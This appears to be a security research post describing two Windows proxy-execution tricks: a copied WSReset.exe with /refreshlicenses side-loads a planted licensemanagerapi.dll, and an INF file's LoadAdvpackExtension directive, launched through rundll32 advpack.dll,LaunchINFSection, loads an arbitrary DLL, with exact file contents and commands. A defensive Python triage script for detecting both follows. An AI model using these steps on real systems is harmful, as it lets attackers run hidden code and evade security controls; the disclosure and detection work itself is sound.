1 little known secret of wsreset.exe

The wsreset.exe program is a known lolbin, but it has a lot more to offer than is currently known.

When it is invoked with the /refreshlicenses command-line argument, it loads the licensemanagerapi.dll library from the current path. So copying the c:\windows\System32\WSReset.exe file to a different folder, dropping a payload into a licensemanagerapi.dll file, and then launching that copy of WSReset.exe with the /refreshlicenses command-line argument will load the payload.

1 little known secret of advpack.dll, LaunchINFSection

Yes, yet another oldie with a secret…

The .inf files are as old as Windows itself, and their internal structure has been covered by many over at least the last two decades.

So, what’s new?

Well…

Ever heard of LoadAdvpackExtension?

This simple .inf file demonstrates how to use it to load a DLL of your choice:

[version]
signature="$CHICAGO$"
AdvancedINF=2.5,"test"

[DefaultInstall]
Patching=1
LoadAdvpackExtension=test64.dll

To launch it, you need to do the following:

Place the above .inf file in c:\test\test.inf
Place test64.dll in c:\test
Go to terminal: cmd.exe
Run: set path=.
Run: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection c:\test\test.inf,,1,

We change the PATH to make sure our test64.dll is found in the current directory and then loaded.
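For defenders, both tricks described above leave recognisable traces in process-creation telemetry and in the .inf file itself. The following triage sketch is an added example, not code from the original post: it flags a WSReset.exe copy running outside System32 or with /refreshlicenses, flags rundll32 calling advpack.dll,LaunchINFSection, and extracts any LoadAdvpackExtension directive from an INF. The event field names (modelled on Sysmon Event ID 1), the sample records, the finding labels and the function names are assumptions constructed for illustration.

```python
import ntpath
import re

SYSTEM32 = r"c:\windows\system32"

# Constructed process-creation records (field names modelled on Sysmon Event ID 1).
EVENTS = [
    {"Image": r"C:\Windows\System32\WSReset.exe", "CommandLine": "WSReset.exe"},
    {"Image": r"C:\Users\Public\WSReset.exe",
     "CommandLine": "WSReset.exe /refreshlicenses"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe advpack.dll,LaunchINFSection c:\test\test.inf,,1,"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
]
# Constructed INF text, same shape as the file shown above.
SAMPLE_INF = ('[version]\nsignature="$CHICAGO$"\n\n[DefaultInstall]\n'
              'Patching=1\nLoadAdvpackExtension = test64.dll ; extension\n')

def inf_extensions(inf_text):
    """Return (section, dll) for every LoadAdvpackExtension directive in an INF."""
    hits, section = [], None
    for raw in inf_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts an INF comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip()
            continue
        m = re.match(r"LoadAdvpackExtension\s*=\s*(.+)", line, re.IGNORECASE)
        if m:
            hits.append((section, m.group(1).strip().strip('"')))
    return hits

def triage(event):
    """Return finding labels for one process-creation record."""
    image, cmd = event["Image"].lower(), event["CommandLine"].lower()
    name, folder = ntpath.basename(image), ntpath.dirname(image)
    findings = []
    if name == "wsreset.exe" and folder != SYSTEM32:
        findings.append("wsreset-copy-outside-system32")
    if name == "wsreset.exe" and "/refreshlicenses" in cmd:
        findings.append("wsreset-refreshlicenses")
    # Also matches LaunchINFSectionEx, which shares the prefix.
    if name == "rundll32.exe" and re.search(r"advpack(\.dll)?\s*,\s*launchinfsection", cmd):
        findings.append("advpack-launchinfsection")
    return findings

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev), ev["CommandLine"])
    print(inf_extensions(SAMPLE_INF))
```

A module-load rule for licensemanagerapi.dll or an extension DLL loaded from a user-writable folder would complement these command-line checks.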